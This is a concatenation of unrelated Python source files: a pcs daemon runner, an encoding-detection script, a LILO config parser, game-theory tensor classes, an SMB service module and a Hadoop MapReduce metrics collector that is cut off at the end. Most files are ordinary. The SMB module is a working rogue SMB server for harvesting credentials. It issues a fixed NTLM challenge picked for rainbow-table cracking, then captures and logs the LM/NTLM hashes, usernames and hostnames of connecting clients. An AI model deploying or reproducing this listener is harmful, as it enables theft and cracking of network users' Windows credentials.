async with sync_config_lock:
next_run_time = await ruby_pcsd_wrapper.sync_configs()
IOLoop.current().call_at(next_run_time, config_synchronization)
return config_synchronization
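# Illustrative sketch (hypothetical helper, not used elsewhere): config_sync
# above builds a self-rescheduling task -- each run awaits the Ruby daemon,
# receives the absolute time of the next run and re-registers itself on the
# IOLoop via call_at. The same pattern in isolation:
def _example_self_rescheduling(get_next_run_time):
    async def tick():
        next_run_time = await get_next_run_time()
        IOLoop.current().call_at(next_run_time, tick)
    return tick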
def configure_app(
session_storage: session.Storage,
ruby_pcsd_wrapper: ruby_pcsd.Wrapper,
sync_config_lock: Lock,
public_dir,
disable_gui=False,
debug=False,
):
def make_app(https_server_manage: HttpsServerManage):
"""
        https_server_manage -- allows control of the server (specifically
reload its SSL certificates). A relevant handler should get this
object via the method `initialize`.
"""
routes = sinatra_remote.get_routes(
ruby_pcsd_wrapper,
sync_config_lock,
https_server_manage,
)
if not disable_gui:
routes.extend(
# old web ui by default
[(r"/", RedirectHandler, dict(url="/manage"))]
+ [(r"/ui", RedirectHandler, dict(url="/ui/"))]
+ ui.get_routes(
url_prefix="/ui/",
app_dir=os.path.join(public_dir, "ui"),
fallback_page_path=os.path.join(
public_dir,
"ui_instructions.html",
),
session_storage=session_storage,
)
+ sinatra_ui.get_routes(
session_storage, ruby_pcsd_wrapper, public_dir
)
)
return Application(routes, debug=debug)
return make_app
def main():
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
Path(settings.pcsd_log_location).touch(mode=0o600, exist_ok=True)
log.setup(settings.pcsd_log_location)
env = prepare_env(os.environ, log.pcsd)
if env.has_errors:
raise SystemExit(1)
if env.PCSD_DEBUG:
log.enable_debug()
sync_config_lock = Lock()
ruby_pcsd_wrapper = ruby_pcsd.Wrapper(
settings.pcsd_ruby_socket,
debug=env.PCSD_DEBUG,
)
make_app = configure_app(
session.Storage(env.PCSD_SESSION_LIFETIME),
ruby_pcsd_wrapper,
sync_config_lock,
env.PCSD_STATIC_FILES_DIR,
disable_gui=env.PCSD_DISABLE_GUI,
debug=env.PCSD_DEV,
)
pcsd_ssl = ssl.PcsdSSL(
server_name=socket.gethostname(),
cert_location=settings.pcsd_cert_location,
key_location=settings.pcsd_key_location,
ssl_options=env.PCSD_SSL_OPTIONS,
ssl_ciphers=env.PCSD_SSL_CIPHERS,
)
try:
SignalInfo.server_manage = HttpsServerManage(
make_app,
port=env.PCSD_PORT,
bind_addresses=env.PCSD_BIND_ADDR,
ssl=pcsd_ssl,
).start()
except socket.gaierror as e:
log.pcsd.error(
"Unable to bind to specific address(es), exiting: %s ", e
)
raise SystemExit(1) from e
except OSError as e:
log.pcsd.error("Unable to start pcsd daemon, exiting: %s ", e)
raise SystemExit(1) from e
except ssl.SSLCertKeyException as e:
for error in e.args:
log.pcsd.error(error)
log.pcsd.error("Invalid SSL certificate and/or key, exiting")
raise SystemExit(1) from e
ioloop = IOLoop.current()
ioloop.add_callback(sign_ioloop_started)
if systemd.is_systemd() and env.NOTIFY_SOCKET:
ioloop.add_callback(systemd.notify, env.NOTIFY_SOCKET)
ioloop.add_callback(config_sync(sync_config_lock, ruby_pcsd_wrapper))
ioloop.start()
|
feist/pcs
|
pcs/daemon/run.py
|
Python
|
gpl-2.0
| 4,728 | 0 |
#!/usr/bin/env python
'''
*******************************************************************************
Description: This tool can help you determine the character
encoding of a text file by converting one line from
the file to every(?) possible character encoding.
It writes the converted lines to a new text file
using the same filename but appending the
extension '.encodings' to it.
You have to examine this file visually to find the
correct encoding.
Usage : test_encodings.py filename [number of line to test]
Licence : Public Domain.
Author : Antonios Tsolis (2016)
*******************************************************************************
'''
import io
import os
import sys
from encodings.aliases import aliases
encs = {
"ascii", "big5", "big5hkscs",
"cp037", "cp424", "cp437", "cp500", "cp720", "cp737", "cp775",
"cp850", "cp852", "cp855", "cp856", "cp857", "cp858", "cp860",
"cp861", "cp862", "cp863", "cp864", "cp865", "cp866", "cp869",
"cp874", "cp875", "cp932", "cp949", "cp950",
"cp1006", "cp1026", "cp1140", "cp1250", "cp1251", "cp1252",
"cp1253", "cp1254", "cp1255", "cp1256", "cp1257", "cp1258",
"euc_jp", "euc_jis_2004", "euc_jisx0213", "euc_kr",
"gb2312", "gbk", "gb18030", "hz",
"iso2022_jp", "iso2022_jp_1", "iso2022_jp_2", "iso2022_jp_2004",
"iso2022_jp_3", "iso2022_jp_ext", "iso2022_kr",
"latin_1", "iso8859_2", "iso8859_3", "iso8859_4", "iso8859_5",
"iso8859_6", "iso8859_7", "iso8859_8", "iso8859_9", "iso8859_10",
"iso8859_13", "iso8859_14", "iso8859_15", "iso8859_16",
"johab", "koi8_r", "koi8_u",
"mac_cyrillic", "mac_greek", "mac_iceland",
"mac_latin2", "mac_roman", "mac_turkish",
"ptcp154", "shift_jis", "shift_jis_2004", "shift_jisx0213",
"utf_32", "utf_32_be", "utf_32_le",
"utf_16", "utf_16_be", "utf_16_le",
"utf_7", "utf_8", "utf_8_sig",
"idna", "mbcs", "palmos", "punycode", "rot_13",
"raw_unicode_escape", "unicode_escape", "unicode_internal",
"base64_codec", "bz2_codec", "hex_codec", "uu_codec", "zlib_codec"
}
def write_encodings(filename, line_number, final_encoding):
# To ensure that we cover as many as possible encodings,
# we take the union between our predefined encoding set and the
# set of the values from the encodings.aliases.aliases.
encodings = encs.union(set(aliases.values()))
data = dict()
# Read line from file
try:
with io.open(filename, "rb") as f:
lines = f.readlines()
line = lines[line_number-1]
print("\nProcessing line number: " + str(line_number))
if len(line) < 3:
print("!!!Warning!!!: Possible empty line.")
print("")
except Exception:
_, err, _ = sys.exc_info()
print("Error reading " + filename)
print(err)
sys.exit(1)
# Decode it using every possible encoding
for enc in encodings:
try:
data[enc] = line.decode(enc)
except Exception:
_, err, _ = sys.exc_info()
print("Cannot decode using " + enc)
# print(err)
# We write the results in a new utf-8 text file
# We use the same filename + an '.encodings' extension
fpath = os.path.abspath(filename)
newfilename = fpath + '.encodings'
print("\nWriting successfully tested encodings in " + newfilename)
with open(newfilename, 'w') as out:
c = 0
for enc in sorted(data.keys()):
try:
out.write("%-20s" % enc)
if (sys.version_info[0] < 3):
line = data[enc].encode(final_encoding)
else:
line = data[enc]
out.write(line)
out.write(os.linesep)
c += 1
except Exception:
_, err, _ = sys.exc_info()
print("Cannot encode " + enc + " to " + final_encoding)
# print(err)
print("\n" + str(c) + " out of " + str(len(encodings)) +
" tested encodings were written.\n")
if __name__ == '__main__':
nargs = len(sys.argv)-1
if nargs < 1 or nargs > 2:
exit("Usage: test_encodings.py filename [number of line to test]")
if nargs == 2:
line_number = int(sys.argv[2])
else:
line_number = 1
write_encodings(sys.argv[1], line_number, 'utf_8')
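# Illustrative usage note (hypothetical file name and line number): running
#
#     python test_encodings.py notes.txt 3
#
# decodes line 3 of notes.txt with every candidate codec and writes the
# successful attempts to notes.txt.encodings, one line per codec with the
# codec name left-justified in a 20-character column ("%-20s" above).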
|
Alamot/code-snippets
|
encodings/test_encodings.py
|
Python
|
unlicense
| 4,814 | 0.00187 |
#
#LiloConf.py
#
import sys, re, os
import logging
import GrubConf
class LiloImage(object):
def __init__(self, lines, path):
self.reset(lines, path)
def __repr__(self):
return ("title: %s\n"
" root: %s\n"
" kernel: %s\n"
" args: %s\n"
" initrd: %s\n" %(self.title, self.root, self.kernel,
self.args, self.initrd))
def reset(self, lines, path):
self._initrd = self._kernel = self._readonly = None
self._args = ""
self.title = ""
self.lines = []
self.path = path
self.root = ""
map(self.set_from_line, lines)
def set_from_line(self, line, replace = None):
(com, arg) = GrubConf.grub_exact_split(line, 2)
if self.commands.has_key(com):
if self.commands[com] is not None:
setattr(self, self.commands[com], re.sub('^"(.+)"$', r"\1", arg.strip()))
else:
logging.info("Ignored image directive %s" %(com,))
else:
logging.warning("Unknown image directive %s" %(com,))
# now put the line in the list of lines
if replace is None:
self.lines.append(line)
else:
self.lines.pop(replace)
self.lines.insert(replace, line)
def set_kernel(self, val):
self._kernel = (None, self.path + "/" + val)
def get_kernel(self):
return self._kernel
kernel = property(get_kernel, set_kernel)
def set_initrd(self, val):
self._initrd = (None, self.path + "/" + val)
def get_initrd(self):
return self._initrd
initrd = property(get_initrd, set_initrd)
def set_args(self, val):
self._args = val
def get_args(self):
args = self._args
if self.root:
args += " root=" + self.root
if self.readonly:
args += " ro"
return args
args = property(get_args, set_args)
def set_readonly(self, val):
self._readonly = 1
def get_readonly(self):
return self._readonly
readonly = property(get_readonly, set_readonly)
# set up command handlers
commands = { "label": "title",
"root": "root",
"rootnoverify": "root",
"image": "kernel",
"initrd": "initrd",
"append": "args",
"read-only": "readonly",
"chainloader": None,
"module": None}
class LiloConfigFile(object):
def __init__(self, fn = None):
self.filename = fn
self.images = []
self.timeout = -1
self._default = 0
if fn is not None:
self.parse()
def parse(self, buf = None):
if buf is None:
if self.filename is None:
raise ValueError, "No config file defined to parse!"
f = open(self.filename, 'r')
lines = f.readlines()
f.close()
else:
lines = buf.split("\n")
path = os.path.dirname(self.filename)
img = []
for l in lines:
l = l.strip()
# skip blank lines
if len(l) == 0:
continue
# skip comments
if l.startswith('#'):
continue
# new image
if l.startswith("image"):
if len(img) > 0:
self.add_image(LiloImage(img, path))
img = [l]
continue
if len(img) > 0:
img.append(l)
continue
(com, arg) = GrubConf.grub_exact_split(l, 2)
if self.commands.has_key(com):
if self.commands[com] is not None:
setattr(self, self.commands[com], arg.strip())
else:
logging.info("Ignored directive %s" %(com,))
else:
logging.warning("Unknown directive %s" %(com,))
if len(img) > 0:
self.add_image(LiloImage(img, path))
def add_image(self, image):
self.images.append(image)
def _get_default(self):
for i in range(0, len(self.images) - 1):
if self.images[i].title == self._default:
return i
return 0
def _set_default(self, val):
self._default = val
default = property(_get_default, _set_default)
commands = { "default": "self.default",
"timeout": "self.timeout",
"prompt": None,
"relocatable": None,
}
if __name__ == "__main__":
    if len(sys.argv) < 2:
raise RuntimeError, "Need a grub.conf to read"
g = LiloConfigFile(sys.argv[1])
for i in g.images:
print i #, i.title, i.root, i.kernel, i.args, i.initrd
print g.default
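# Illustrative note (hypothetical stanza): a lilo.conf entry of the shape below
# is what LiloImage consumes -- "image" feeds .kernel, "label" .title, "root"
# .root, "append" .args, and "read-only" makes get_args() append " ro" (see the
# commands mapping above):
#
#     image=/boot/vmlinuz-2.6.18-xen
#         label=xenlinux
#         root=/dev/sda1
#         read-only
#         append="console=tty0"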
|
mikesun/xen-cow-checkpointing
|
tools/pygrub/src/LiloConf.py
|
Python
|
gpl-2.0
| 4,887 | 0.006753 |
# Copyright 2019 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Big tensor games."""
from absl import logging # pylint:disable=unused-import
import numpy as np
from open_spiel.python.algorithms.adidas_utils.helpers import misc
class TensorGame(object):
"""Tensor Game."""
def __init__(self, pt, seed=None):
"""Ctor. Inits payoff tensor (players x actions x ... np.array).
Args:
pt: payoff tensor, np.array
seed: seed for random number generator, used if computing best responses
"""
if np.any(pt < 0.):
raise ValueError("Payoff tensor must contain non-negative values")
self.pt = pt
self.seed = seed
self.random = np.random.RandomState(seed)
def num_players(self):
return self.pt.shape[0]
def num_strategies(self):
return self.pt.shape[1:]
def payoff_tensor(self):
return self.pt
def get_payoffs_for_strategies(self, policies):
"""Return vector of payoffs for all players given list of strategies.
Args:
policies: list of integers indexing strategies for each player
Returns:
np.array (length num players) of payoffs
"""
return self.pt[tuple([slice(None)] + policies)]
def best_response(self, mixed_strategy, return_exp=False):
"""Return best response and its superiority over the current strategy.
Args:
mixed_strategy: np.ndarray (distribution over strategies)
return_exp: bool, whether to return how much best response exploits the
given mixed strategy (default is False)
Returns:
br: int, index of strategy (ties split randomly)
exp: u(br) - u(mixed_strategy)
"""
logging.warn("Assumes symmetric game! Returns br for player 0.")
gradient = misc.pt_reduce(self.pt[0],
[mixed_strategy] * self.num_players(),
[0])
br = misc.argmax(self.random, gradient)
exp = gradient.max() - gradient.dot(mixed_strategy)
if return_exp:
return br, exp
else:
return br
def best_population_response(self, dist, policies):
"""Returns the best response to the current population of policies.
Args:
dist: np.ndarray, distribution over policies
policies: list of integers indexing strategies for each player
Returns:
best response, exploitability tuple (see best_response)
"""
ns = self.num_strategies()
mixed_strat = np.zeros(ns)
for pure_strat, prob in zip(policies, dist):
mixed_strat[pure_strat] += prob
return self.best_response(mixed_strat)
class ElFarol(TensorGame):
"""N-Player, 2-Action symmetric game with unique symmetric Nash."""
def __init__(self, n=2, c=0.5, B=0, S=1, G=2, seed=None):
"""Ctor. Initializes payoff tensor (N x (2,) * N np.array).
See Section 3.1, The El Farol Stage Game in
http://www.econ.ed.ac.uk/papers/id186_esedps.pdf
action 0: go to bar
action 1: avoid bar
Args:
n: int, number of players
c: float, threshold for `crowded' as a fraction of number of players
B: float, payoff for going to a crowded bar
S: float, payoff for staying at home
G: float, payoff for going to an uncrowded bar
seed: seed for random number generator, used if computing best responses
"""
assert G > S > B, "Game parameters must satisfy G > S > B."
pt = np.zeros((n,) + (2,) * n)
for idx in np.ndindex(pt.shape):
p = idx[0]
a = idx[1:]
a_i = a[p]
go_to_bar = (a_i < 1)
crowded = (n - 1 - sum(a) + a_i) >= (c * n)
if go_to_bar and not crowded:
pt[idx] = G
elif go_to_bar and crowded:
pt[idx] = B
else:
pt[idx] = S
super().__init__(pt, seed)
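# Illustrative usage sketch (hypothetical helper, not part of the library API);
# the parameter values are made up.
def _example_el_farol_best_response():
  game = ElFarol(n=3, c=0.5, seed=0)
  uniform = np.ones(2) / 2.0  # symmetric mixed strategy over {go, avoid}
  br, exp = game.best_response(uniform, return_exp=True)
  payoffs = game.get_payoffs_for_strategies([0, 1, 1])  # only player 0 goes
  return br, exp, payoffs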
|
deepmind/open_spiel
|
open_spiel/python/algorithms/adidas_utils/games/big.py
|
Python
|
apache-2.0
| 4,268 | 0.005155 |
import socket
import struct
import sys
import util
from threading import Thread
from service import Service
class smb(Service):
def __init__(self):
super(smb, self).__init__('SMB Service')
self.config['port'].value = 445
self.captured_hashes = {}
self.info = """
SMB listener for harvesting NTLM/LM hashes.
Authentication requests use the standard challenge of
            1122334455667788, for which precomputed rainbow
            tables are widely available.
"""
# parse NTLM/LM hashes
# scapy has very limited SMB packet support, so we have to do this manually
def parse_credentials(self, data):
# offsets based on security blob starting at data[59]
data = data[59:]
lm_offset = struct.unpack('<I', data[16:20])[0]
ntlm_offset = struct.unpack('<I', data[24:28])[0]
name_length = struct.unpack('<h', data[36:38])[0]
name_offset = struct.unpack('<I', data[40:44])[0]
host_length = struct.unpack('<h', data[46:48])[0]
host_offset = struct.unpack('<I', data[48:52])[0]
lm_hash = ntlm_hash = ''
# LM hash
for i in data[lm_offset:lm_offset + 24]:
tmp = str(hex(ord(i))).replace('0x', '')
            if len(tmp) == 1:
# hex() removes leading 0's in hex; we need them.
tmp = '0' + tmp
lm_hash += tmp
# NTLM hash
for i in data[ntlm_offset:ntlm_offset + 24]:
tmp = str(hex(ord(i))).replace('0x', '')
            if len(tmp) == 1:
tmp = '0' + tmp
ntlm_hash += tmp
# host name
hname = ''
for i in range(host_offset, (host_offset + host_length)):
tmp = struct.unpack('<c', data[i])[0]
            if tmp == '\x00':
continue
hname += tmp
if name_length > 100:
# sanity
return
# user name
uname = ''
for i in range(name_offset, (name_offset + name_length)):
tmp = struct.unpack('<c', data[i])[0]
            if tmp == '\x00':
# null bytes
continue
uname += tmp
# add the username and build the list
# list consists of
# HOST NAME
# LM HASH
# NTLM HASH
        if uname not in self.captured_hashes:
tmp = [hname, lm_hash.upper(), ntlm_hash.upper()]
self.captured_hashes[uname] = tmp
data = 'Username: %s\nHost: %s\nLM: %s\nNTLM: %s\nChallenge: %s\n' \
% (uname, hname, lm_hash.upper(),
ntlm_hash.upper(), '1122334455667788')
self.log_msg(data)
# get packet payload
def get_payload(self, data):
hexcode = str(hex(ord(data[4])))
if hexcode == '0x72':
# Build the payload for a Negotiate Protocol Response
# netbios
payload = "\x00\x00\x00\x55"
# smb header
payload += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8"
payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
payload += "\xff\xff\xff\xfe\x00\x00\x00\x00"
# negotiate protocol response
payload += "\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00"
payload += "\x00\x00\x01\x00\x00\x00\x00\x00\xfd\xe3\x00\x80"
payload += "\x11\xb9\x14\xe4\x77\xc8\xcd\x01\x68\x01\x00\x10"
payload += "\x00\xb5\x9b\x73\x9d\xb7\xc2\xb7\x40\x83\xd6\x52"
payload += "\x31\xec\xb3\x84\x53"
return (payload, 0)
elif hexcode == '0x73':
# check if its a NEGOTIATE or AUTH
message_type = str(hex(ord(data[67])))
if message_type == '0x1':
# Build the payload for a NTLMSSP_CHALLENGE
# netbios
payload = "\x00\x00\x00\xdd"
# smb header
payload += "\xff\x53\x4d\x42\x73\x16"
payload += "\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00\x00"
payload += "\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
payload += "\x00\x08\x10\x00"
# session setup andx response, error more processing
payload += "\x04\xff\x00\xdd\x00\x00\x00\x68\x00\xb2\x00"
payload += "\x4e\x54\x4c\x4d\x53\x53\x50\x00\x02\x00\x00"
payload += "\x00\x04\x00\x04\x00\x38\x00\x00\x00\x15\x82"
payload += "\x8a\xe2\x11\x22\x33\x44\x55\x66\x77\x88\x00" #ntlm challenge 1122334455667788
payload += "\x00\x00\x00\x00\x00\x00\x00\x2c\x00\x2c\x00"
payload += "\x3c\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00"
payload += "\x0f\x4e\x00\x4f\x00\x02\x00\x04\x00\x4e\x00"
payload += "\x4f\x00\x01\x00\x04\x00\x4e\x00\x4f\x00\x04"
payload += "\x00\x04\x00\x6e\x00\x6f\x00\x03\x00\x04\x00"
payload += "\x6e\x00\x6f\x00\x06\x00\x04\x00\x01\x00\x00"
payload += "\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e"
payload += "\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00"
payload += "\x35\x00\x2e\x00\x31\x00\x00\x00\x57\x00\x69"
payload += "\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00"
payload += "\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20"
payload += "\x00\x4c\x00\x41\x00\x4e\x00\x20\x00\x4d\x00"
payload += "\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72"
payload += "\x00\x00"
return (payload, 0)
elif message_type == '0x3':
# should be an AUTH packet
# parse credentials
self.parse_credentials(data)
# send a STATUS_LOGIN_FAILURE
# netbios
payload = "\x00\x00\x00\x23"
# smb header
payload += "\xff\x53\x4d\x42\x73\x6d\x00\x00\xc0\x98\x07"
payload += "\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
payload += "\x00\x00\xff\xff\xff\xfe\x00\x08\x20\x00"
# session setup andx response, status_login_failure
payload += "\x00\x00\x00"
return (payload, 1)
else:
return (None, 1)
# dbg -- dump the packet
def dbg_dump(self, data):
cnt = 0
for i in data:
sys.stdout.write(str(hex(ord(i))) + ' ')
cnt += 1
if cnt % 16 == 0:
print ''
cnt = 0
print ''
# handle packets
def handler(self, con, data):
try:
if len(data) > 4:
data = data[4:]
(payload, err) = self.get_payload(data)
if not payload is None and err is 0:
con.send(payload)
elif not payload is None and err is 1:
con.send(payload)
return False
else:
return False
except Exception, j:
util.Error('SMB error: %s' % j)
return False
return True
# threaded init
def initialize_bg(self):
util.Msg('Starting SMB listener...')
thread = Thread(target=self.initialize)
thread.start()
return True
# initialize SMB listener
def initialize(self):
socker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
socker.settimeout(3)
socker.bind(('', self.config['port'].value))
socker.listen(5)
self.running = True
try:
while self.running:
try:
con, addr = socker.accept()
except KeyboardInterrupt:
break
except:
continue
self.log_msg('Connection from %s' % addr[0])
while self.running:
data = con.recv(256)
if not self.handler(con, data):
break
con.shutdown(socket.SHUT_RDWR)
con.close()
self.log_msg('Closed connection with %s.\n' % addr[0])
except KeyboardInterrupt:
self.running = False
except socket.error:
pass
except Exception, j:
util.Error('Error with SMB listener: %s' % j)
self.running = False
socker.close()
util.debug('SMB listener shutdown.')
def cli(self, parser):
""" initialize CLI options
"""
parser.add_argument('--smb', help='SMB Service', action='store_true',
default=False, dest=self.which)
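# Illustrative sketch (not part of the original module): the byte-by-byte hex
# loops in parse_credentials can be written more compactly with struct and
# binascii. The offsets are the same ones the service assumes above (security
# blob starting at byte 59 of the SMB payload); this is a simplified rewrite
# for reference, not the code path the listener actually runs.
import binascii
def _parse_ntlmssp_sketch(data):
    blob = data[59:]
    lm_offset = struct.unpack('<I', blob[16:20])[0]
    ntlm_offset = struct.unpack('<I', blob[24:28])[0]
    lm_hash = binascii.hexlify(blob[lm_offset:lm_offset + 24]).upper()
    ntlm_hash = binascii.hexlify(blob[ntlm_offset:ntlm_offset + 24]).upper()
    return lm_hash, ntlm_hash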
| bacemtayeb/Tierra | src/modules/services/smb.py | Python | gpl-3.0 | 8,923 | 0.001121 |
import time
import requests
from collectors.lib import utils
from collectors.lib.collectorbase import CollectorBase
# Reference: https://hadoop.apache.org/docs/r2.7.2/hadoop-mapreduce-client/hadoop-mapreduce-client-core/MapredAppMasterRest.html
REST_API = {"YARN_APPS_PATH": "ws/v1/cluster/apps",
"MAPREDUCE_JOBS_PATH": "ws/v1/mapreduce/jobs"}
# response from 'ws/v1/mapreduce/jobs'
# {
# "jobs": {
# "job": [
# {
# "startTime": 1453761316277,
# "finishTime": 0,
# "elapsedTime": 99221829,
# "id": "job_1453738555560_0001",
# "name": "WordCount",
# "user": "vagrant",
# "state": "RUNNING",
# "mapsTotal": 1,
# "mapsCompleted": 0,
# "reducesTotal": 1,
# "reducesCompleted": 0,
# "mapProgress": 48.335266,
# "reduceProgress": 0.0,
# "mapsPending": 0,
# "mapsRunning": 1,
# "reducesPending": 1,
# "reducesRunning": 0,
# "uberized": false,
# "diagnostics": "",
# "newReduceAttempts": 1,
# "runningReduceAttempts": 0,
# "failedReduceAttempts": 0,
# "killedReduceAttempts": 0,
# "successfulReduceAttempts": 0,
# "newMapAttempts": 0,
# "runningMapAttempts": 1,
# "failedMapAttempts": 1,
# "killedMapAttempts": 0,
# "successfulMapAttempts": 0
# }
# ]
# }
# }
JOB = ['elapsedTime', 'mapsTotal', 'mapsCompleted', 'reducesTotal', 'reducesCompleted', 'mapsPending', 'mapsRunning', 'reducesPending', 'reducesRunning', 'newReduceAttempts', 'runningReduceAttempts',
'failedReduceAttempts', 'killedReduceAttempts', 'successfulReduceAttempts', 'newMapAttempts', 'runningMapAttempts', 'failedMapAttempts', 'killedMapAttempts', 'successfulMapAttempts']
# from 'http://localhost:8088/proxy/application_1453738555560_0001/ws/v1/mapreduce/jobs/application_1453738555560_0001/counters'
# {
# "jobCounters": {
# "id": "job_1453738555560_0001",
# "counterGroup": [
# {
# "counterGroupName": "org.apache.hadoop.mapreduce.FileSystemCounter",
# "counter": [
# {
# "name": "FILE_BYTES_READ",
# "totalCounterValue": 0,
# "mapCounterValue": 1,
# "reduceCounterValue": 2
# },
# {
# "name": "FILE_BYTES_WRITTEN",
# "totalCounterValue": 3,
# "mapCounterValue": 4,
# "reduceCounterValue": 5
# }
# ]
# }
# ]
# }
# }
JOB_COUNTER = ['reduceCounterValue', 'mapCounterValue', 'totalCounterValue']
# from 'http://localhost:8088/proxy/application_1453738555560_0001/ws/v1/mapreduce/jobs/application_1453738555560_0001/tasks'
# {
# "tasks": {
# "task": [
# {
# "startTime": 1453761318527,
# "finishTime": 0,
# "elapsedTime": 99869037,
# "progress": 49.11076,
# "id": "task_1453738555560_0001_m_000000",
# "state": "RUNNING",
# "type": "MAP",
# "successfulAttempt": "",
# "status": "map > map"
# }
# ]
# }
# }
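# Illustrative sketch (not part of the original module): walks a 'jobCounters'
# document shaped like the example above and yields one entry per configured
# counter value, mirroring what _mapreduce_job_counters_metrics emits below.
def _iter_job_counters_sketch(job_counters_json):
    for group in job_counters_json.get('jobCounters', {}).get('counterGroup', []):
        group_name = group.get('counterGroupName')
        for counter in group.get('counter', []):
            for metric in JOB_COUNTER:
                yield group_name, counter.get('name'), metric, counter.get(metric)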
class MapReduce(CollectorBase):
def __init__(self, config, logger, readq):
super(MapReduce, self).__init__(config, logger, readq)
self.port = self.get_config('port', 8080)
self.host = self.get_config('host', "localhost")
self.http_prefix = 'http://%s:%s' % (self.host, self.port)
def __call__(self):
try:
running_apps = self._get_running_app_ids()
running_jobs = self._mapreduce_job_metrics(running_apps)
self._mapreduce_job_counters_metrics(running_jobs)
self._mapreduce_task_metrics(running_jobs)
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '0'))
except Exception as e:
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1'))
self.log_exception('exception collecting mapreduce metrics %s' % e)
def _get_running_app_ids(self):
try:
running_apps = {}
metrics_json = self.request("/%s?%s" % (REST_API['YARN_APPS_PATH'], "states=RUNNING&applicationTypes=MAPREDUCE"))
if metrics_json.get('apps'):
if metrics_json['apps'].get('app') is not None:
for app_json in metrics_json['apps']['app']:
app_id = app_json.get('id')
tracking_url = app_json.get('trackingUrl')
app_name = app_json.get('name')
if app_id and tracking_url and app_name:
running_apps[app_id] = (app_name, tracking_url)
except Exception as e:
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1'))
self.log_exception('exception collecting yarn apps metric for mapreduce \n %s',e)
return running_apps
def _mapreduce_job_metrics(self, running_apps):
        '''
        Emit metrics for each running MapReduce job and return a dictionary
        keyed by job_id:
        {
            job_id: {
                'job_name': job_name,
                'app_name': app_name,
                'user_name': user_name,
                'tracking_url': tracking_url
            }
        }
        '''
try:
running_jobs = {}
for app_id, (app_name, tracking_url) in running_apps.iteritems():
ts = time.time()
metrics_json = self.request_url("%s%s" % (tracking_url,REST_API['MAPREDUCE_JOBS_PATH']))
if metrics_json.get('jobs'):
if metrics_json['jobs'].get('job'):
for job_json in metrics_json['jobs']['job']:
job_id = job_json.get('id')
job_name = job_json.get('name')
user_name = job_json.get('user')
if job_id and job_name and user_name:
# Build the structure to hold the information for each job ID
running_jobs[str(job_id)] = {'job_name': str(job_name),
'app_name': str(app_name),
'user_name': str(user_name),
'tracking_url': "%s%s/%s" % (tracking_url, REST_API['MAPREDUCE_JOBS_PATH'], job_id)}
for metric in JOB:
self._readq.nput('mapreduce.job.%s %d %d app_name=%s user_name=%s job_name=%s' % (metric, ts, job_json[metric], utils.remove_invalid_characters(str(app_name)), utils.remove_invalid_characters(str(user_name)), utils.remove_invalid_characters(str(job_name))))
except Exception as e:
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1'))
self.log_exception('exception collecting mapreduce jobs metric \n %s',e)
return running_jobs
def _mapreduce_job_counters_metrics(self, running_jobs):
        '''
        Emit counter metrics (total/map/reduce values) for every counter group
        of each running job.
        '''
try:
for job_id, job_metrics in running_jobs.iteritems():
ts = time.time()
job_name = job_metrics['job_name']
if job_name:
metrics_json = self.request_url("%s%s" % (job_metrics['tracking_url'],'/counters'))
if metrics_json.get('jobCounters'):
if metrics_json['jobCounters'].get('counterGroup'):
for counter_group in metrics_json['jobCounters']['counterGroup']:
group_name = counter_group.get('counterGroupName')
if group_name:
if counter_group.get('counter'):
for counter in counter_group['counter']:
counter_name = counter.get('name')
for metric in JOB_COUNTER:
self._readq.nput('mapreduce.job.counter.%s %d %d app_name=%s user_name=%s job_name=%s counter_name=%s' % (metric, ts, counter[metric], utils.remove_invalid_characters(job_metrics.get('app_name')), utils.remove_invalid_characters(job_metrics.get('user_name')), utils.remove_invalid_characters(job_name), utils.remove_invalid_characters(str(counter_name).lower())))
except Exception as e:
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1'))
self.log_exception('exception collecting mapreduce jobs counter metric \n %s',e)
def _mapreduce_task_metrics(self, running_jobs):
        '''
        Emit map/reduce task progress metrics for each running job; results are
        pushed onto the read queue rather than returned.
        '''
try:
for job_id, job_stats in running_jobs.iteritems():
ts = time.time()
metrics_json = self.request_url("%s%s" % (job_stats['tracking_url'],'/tasks'))
if metrics_json.get('tasks'):
if metrics_json['tasks'].get('task'):
for task in metrics_json['tasks']['task']:
task_type = task.get('type')
if task_type:
if task_type == 'MAP':
self._readq.nput('mapreduce.job.map.task.progress %d %d app_name=%s user_name=%s job_name=%s task_type=%s' % (ts, task['progress'], utils.remove_invalid_characters(job_stats.get('app_name')), utils.remove_invalid_characters(job_stats.get('user_name')), utils.remove_invalid_characters(job_stats.get('job_name')), utils.remove_invalid_characters(str(task_type).lower())))
elif task_type == 'REDUCE':
self._readq.nput('mapreduce.job.reduce.task.progress %d %d app_name=%s user_name=%s job_name=%s task_type=%s' % (ts, task['progress'], utils.remove_invalid_characters(job_stats.get('app_name')), utils.remove_invalid_characters(job_stats.get('user_name')), utils.remove_invalid_characters(job_stats.get('job_name')), utils.remove_invalid_characters(str(task_type).lower())))
except Exception as e:
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1'))
self.log_exception('exception collecting mapreduce task metric \n %s',e)
def request(self,uri):
